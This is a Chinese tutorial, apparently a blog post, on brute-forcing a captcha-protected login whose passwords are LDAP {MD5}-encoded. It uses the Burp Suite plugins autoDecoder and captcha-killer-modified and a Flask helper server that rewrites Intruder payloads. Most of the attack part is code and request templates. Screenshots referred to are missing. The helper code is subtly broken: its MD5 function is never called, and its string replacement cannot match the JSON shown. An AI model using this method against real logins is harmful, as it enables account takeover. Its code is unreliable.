登錄口爆破之ldap的md5加密、驗(yàn)證碼認(rèn)證
ldap的md5加密配合autoDecoder插件、captcha-killer-modified插件
autoDecoder例
需要傳入的數(shù)據(jù)包為:
{"username":"admin","password":"{MD5}ISMvKXpXpadDiUoOSoAfww==","code":"YJIV"}
intruder數(shù)據(jù)包設(shè)置如下:
{"username":"admin","password":"§1§","code":"§JOEJ§"}
intruder設(shè)置如下:
由于我們只針對(duì)intruder里的賬號(hào)密碼進(jìn)行爆破,所以解密接口我們用不到,直接捕捉到數(shù)據(jù)包直接返回即可:
@app.route('/decode',methods=["POST"]) # 不解密
def decrypt():
param = request.form.get('data') # 獲取 post 參數(shù)
return param
加密服務(wù)端代碼如下:
# -*- coding:utf-8 -*-
# author:f0ngf0ng
# ldap的md5加密爆破
from flask import Flask,Response,request
from pyDes import *
import base64,hashlib,json
def hash_md5(data):
md = hashlib.md5()
md.update(str(data))
a = md.digest()
b = base64.b64encode(a)
return b
app = Flask(__name__)
@app.route('/encode',methods=["POST"])
def encrypt():
param = request.form.get('data') # 獲取 post 參數(shù)
data = json.loads(param)
print(data)
encry_param = param.replace( "password': '"+ data['password'],"password': '"+"{MD5}" + data['password']) # 密文替換明文,且添加{MD5}關(guān)鍵字
return encry_param
@app.route('/decode',methods=["POST"]) # 不解密
def decrypt():
param = request.form.get('data') # 獲取 post 參數(shù)
return param
if __name__ == '__main__':
app.debug = True # 設(shè)置調(diào)試模式,生產(chǎn)模式的時(shí)候要關(guān)掉debug
app.run(host="0.0.0.0",port="8888")
運(yùn)行如下
python flask.py
autoDecoder設(shè)置如下:
captcha-killer-modified插件頁(yè)面如下:
爆破如下:
浙公網(wǎng)安備 33010602011771號(hào)